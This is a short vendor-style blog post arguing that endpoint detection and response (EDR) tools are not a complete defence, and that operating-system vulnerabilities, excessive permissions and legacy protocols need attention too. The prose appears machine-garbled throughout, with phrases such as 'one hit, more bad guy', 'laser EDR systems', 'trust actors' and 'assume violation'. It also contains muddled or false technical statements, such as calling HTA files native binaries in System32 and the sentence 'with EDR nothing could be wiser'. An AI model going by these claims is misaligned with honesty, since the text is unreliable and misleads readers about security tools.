EDR is not a silver bullet

Old tradition said that shooting a werewolf, vampire, or even just your average bad guy with a silver bullet was a surefire takedown: one hit, more bad guy.

As cybersecurity professionals, we understand – just as people in the Old West knew – that there is no panacea, no silver bullet. Yet humans gravitate to simple solutions to complex challenges, and we are constantly (albeit subconsciously) searching for miracle technology.

Endpoint detection and response (EDR) tools have become standard operating procedures for cybersecurity regimes. They are the starting point for any DSI, and there is nothing wrong with that. In a recent Cymulate study of over 1 million tests performed by our customers in 2021, the most popular test vector was EDR.

Yet cybersecurity players should not assume that EDR is a silver bullet. The thing is, the effectiveness and protection prowess of EDR as a standalone solution has slowly waned over the decade. since the term was coined by Gartner. Although it has become a mainstay of the security posture of enterprises and SMBs, attacks have exploded in frequency, severity and success. Today, EDR faces some of its greatest challenges, including threats targeting laser EDR systems like the highly successful Grandoiero Banking Trojan.

Not a miracle solution… But still very relevant

While EDR shouldn’t be your only line of defense against advanced threats, it’s important to include it in a defense package. It must be installed on all servers in the organization, including those based on Linux. However, installation is not enough. Your organization is at significant risk if the underlying operating system and EDR are not both implemented and fine-tuned. Why? Based on our findings in the study mentioned above, here are three reasons why fine-tuning the EDR and the underlying operating system is crucial:

1. Vulnerabilities

A major challenge with EDR is that not everything related to security depends on EDR. EDR is a vendor-delivered third-party solution that underpins first-party security controls, such as cloud application controls or operating systems. For this reason, there are some things EDR solutions won’t do lest they interfere with production assets. The fact is that hackers frequently take advantage of vulnerabilities in first-party controls to circumvent EDR.

2. Excessive permissions

In many enterprises, operating system permissions are not yet compliant with the principle of least privilege. Often, field workers who have commercial or non-technical roles are granted excessive permissions. When these trust actors can do things like bring up PowerShell to manipulate the Control Panel, run DLLs, and access directories that aren’t the Windows directory, the organization ends up being exposed. When excessive permissions allow DLL loading and injections, various JavaScript-based vulnerabilities, or certificates that allow wildcards, all EDR solutions can do is play catch-up after the attack. The reason? EDR is based on an “assume violation” mentality. And post-execution remediation, by definition, is only relevant once the attack has taken place.

3. Legacy protocols

Every enterprise environment has legacy resources. Legacy applications, TCP IP protocols, operating systems…all of these have legacy ways that often remain enabled by default. Sometimes it’s a case of necessity, but often those backdoors are left open because no one thought to close them.

For example, in a recent patch, Microsoft asked Exchange administrators to disable Basic Authentication, which has always been the default. There is no way to prevent man-in-the-middle attacks with basic authentication enabled, so upgrading to advanced authentication is necessary. This is a legacy protocol that remained exposed…until someone closed the door.

Another example are old Microsoft HTA files. These are native Windows binaries that are used to call Microsoft HTML applications and are located in the Windows System32 folder. A click and these files can be replaced by malware – with EDR nothing could be wiser.

The bottom line

Although they remain the cornerstone of most cybersecurity defenses, EDR systems are clearly not a silver bullet. They are not enough to protect the organization as the first line of defense against security breaches. That said, EDR – if implemented optimally with OS testing and tuning – has an important role to play. To maximize the security ROI of EDR solutions, organizations must ensure that the EDR is not undermined by first-party vulnerabilities, excessive permissions, or legacy protocols.

Kimberly B. Nguyen